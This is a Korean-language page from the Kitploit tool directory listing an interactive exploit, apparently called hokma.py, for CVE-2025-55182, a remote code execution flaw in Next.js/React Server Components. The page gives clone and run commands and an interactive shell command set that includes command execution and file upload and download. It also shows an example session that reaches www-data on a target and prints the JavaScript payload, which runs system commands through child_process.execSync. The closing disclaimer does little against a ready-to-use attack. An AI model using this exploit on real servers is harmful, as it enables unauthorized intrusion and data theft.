Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-shellinteractive | Kitploit
도구/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182-shellinteractive

저장소 보기
2138개월 전Kitploit 검토 완료

CVE-2025-55182-shellinteractive

사용된 기반: https://github.com/Emiyelbarto/CVE-2025-55182-PoC 훌륭한 기여에 정말 감사드립니다.

개요

CVE-2025-55182는 Next.js/React Server Components의 역직렬화 취약점으로, 인증되지 않은 원격 공격자가 영향을 받는 서버에서 임의 코드를 실행할 수 있게 합니다. 이 취약점은 React Server Actions에서 직렬화된 데이터를 부적절하게 처리하는 데서 비롯됩니다.

주요 기능:

  • ✅ 명령 기록 및 자동 완성 기능을 갖춘 대화형 셸
  • ✅ 자동 취약점 탐지
  • ✅ 원격 명령 실행
  • ✅ 파일 업로드/다운로드 기능
  • ✅ 내장 테스트 스위트
  • ✅ 구성 가능한 대상 매개변수

설치

사전 요구사항

  • Python 3.8 이상
  • requests 라이브러리

빠른 설정

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

사용법

기본 사용법

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

대화형 셸 명령

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

예제 세션

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

구성 옵션

옵션기본값설명
대상 URL없음취약한 애플리케이션의 URL
작업 IDuser-profile-action대상으로 할 서버 작업 ID
시간 제한3초요청 시간 제한

기술적 세부사항

취약점 탐지

이 도구는 취약한 시스템에서 충돌을 유발하는 특수하게 조작된 multipart 요청을 전송합니다:

  • 빈 객체 {}와 함께 페이로드 ["$1:a:a"]를 사용합니다
  • HTTP 500 응답 또는 특정 오류 패턴을 통해 취약점을 탐지합니다

익스플로잇 메커니즘

  1. JavaScript 페이로드 구성: Function 생성자를 사용하여 Node.js 스크립트를 생성합니다
  2. 자식 프로세스 실행: child_process.execSync()를 사용하여 시스템 명령을 실행합니다
  3. 응답 추출: 명령 출력을 캡처하여 표시합니다

페이로드 구조

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

윤리적 사용 및 면책 조항

중요한 법적 고지

이 도구는 다음 용도로 사용됩니다:

  • 승인된 보안 테스트
  • 교육 목적
  • 적절한 동의를 받은 취약점 연구

절대 소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 이 도구를 사용하지 마십시오. 컴퓨터 시스템에 대한 무단 접근은 불법이며 비윤리적입니다.

개발자는 이 도구의 오용에 대해 책임을 지지 않습니다. 사용자는 모든 관련 법률을 준수하고 테스트 전에 적절한 승인을 받아야 합니다.

알려진 제한 사항

  1. 대상 요구사항:

    • React Server Components를 갖춘 Node.js 서버
    • CVE-2025-55182에 취약한 환경
    • 자식 프로세스 모듈 사용 가능
  2. 탐지 제한 사항:

    • 오탐/미탐이 발생할 수 있음
    • 특정 오류 응답에 의존함
  3. 익스플로잇 제약 사항:

    • 명령은 서버 프로세스 권한으로 실행됩니다
    • 일부 경우 출력이 잘릴 수 있습니다
    • 복잡한 명령은 특수 이스케이프가 필요할 수 있습니다
도구 다운로드